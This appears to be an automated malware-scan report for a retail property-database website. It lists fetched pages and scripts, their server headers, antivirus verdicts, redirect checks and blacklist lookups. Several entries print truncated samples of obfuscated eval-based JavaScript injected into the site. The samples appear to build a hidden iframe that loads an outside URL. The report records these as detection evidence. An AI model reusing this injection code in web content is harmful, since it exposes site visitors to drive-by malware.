Scanned pages/files
Request | Server response | Status |
http://kirschretail.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 30 Jun 2014 19:26:11 GMT Location: http://www.kirschretail.com/propdb/ Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6 Content-Length: 433 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.kirschretail.com/propdb/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 30 Jun 2014 19:26:12 GMT Location: http://www.kirschretail.com/propdb/users/login Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=263042b484015ce974b377c9393b24ca; expires=Wed, 09-Jul-2014 03:26:12 GMT; path=/propdb X-Powered-By: PHP/5.3.24 | clean |
http://www.kirschretail.com/propdb/users/login | 200 OK Content-Length: 7549 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_82_7c_6d_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_82_7c_6d_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6e_3a_6e_3b_3e_3d_36_6b_77_75_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_82_7c_6d_36_7b_7c_81_74_ Antivirus reports:
| ||
https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://kirschretail.com/propdb/js/jquery-1.7.1.min.js | 200 OK Content-Length: 98245 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_81_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_81_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6e_3a_6e_3b_3e_3d_36_6b_77_75_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_81_36_7b_7c_81_74_6d_36_78_77_7b_ Antivirus reports:
| ||
http://kirschretail.com/propdb/js/all.js | 200 OK Content-Length: 4378 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_81_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_81_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6e_3a_6e_3b_3e_3d_36_6b_77_75_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_81_36_7b_7c_81_74_6d_36_78_77_7b_ Antivirus reports:
| ||
http://kirschretail.com/propdb/js/propdb.js | 200 OK Content-Length: 6188 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_81_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_81_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6e_3a_6e_3b_3e_3d_36_6b_77_75_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_81_36_7b_7c_81_74_6d_36_78_77_7b_ Antivirus reports:
| ||
http://maps.google.com/maps/api/js?sensor=false | 200 OK Content-Length: 4900 Content-Type: text/javascript | clean |
http://kirschretail.com/propdb/users/add | 200 OK Content-Length: 8701 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_82_7c_6d_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_82_7c_6d_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6e_3a_6e_3b_3e_3d_36_6b_77_75_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_82_7c_6d_36_7b_7c_81_74_ Antivirus reports:
| ||
http://kirschretail.com/propdb/js/users.js | 200 OK Content-Length: 4659 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_81_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_81_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6e_3a_6e_3b_3e_3d_36_6b_77_75_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_81_36_7b_7c_81_74_6d_36_78_77_7b_ Antivirus reports:
| ||
http://kirschretail.com/propdb/users/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 30 Jun 2014 19:26:18 GMT Location: http://kirschretail.com/propdb/users/login Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6 Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c30d248527de0cddedc506fcf9fe352d; expires=Wed, 09-Jul-2014 03:26:18 GMT; path=/propdb X-Powered-By: PHP/5.3.24 | clean |
http://kirschretail.com/propdb/users/login | 200 OK Content-Length: 7549 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_82_7c_6d_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_82_7c_6d_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_6e_3a_6e_3b_3e_3d_36_6b_77_75_37_6b_77_7d_76_7c_6d_7a_36_78_70_78_2f_43_15_12_28_82_7c_6d_36_7b_7c_81_74_ Antivirus reports:
| ||
http://kirschretail.com/test404page.js | 404 Not Found Content-Length: 521 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kirschretail.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 30 Jun 2014 19:26:11 GMT
Location: http://www.kirschretail.com/propdb/
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 433
Content-Type: text/html; charset=iso-8859-1
...433 bytes of data.
GET / HTTP/1.1
Host: kirschretail.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 30 Jun 2014 19:26:11 GMT
Location: http://www.kirschretail.com/propdb/
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 433
Content-Type: text/html; charset=iso-8859-1
...433 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kirschretail.com
Referer: http://www.google.com/search?q=kirschretail.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kirschretail.com
Referer: http://www.google.com/search?q=kirschretail.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kirschretail.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kirschretail.com/
Result: kirschretail.com is not infected or malware details are not published yet.
Result: kirschretail.com is not infected or malware details are not published yet.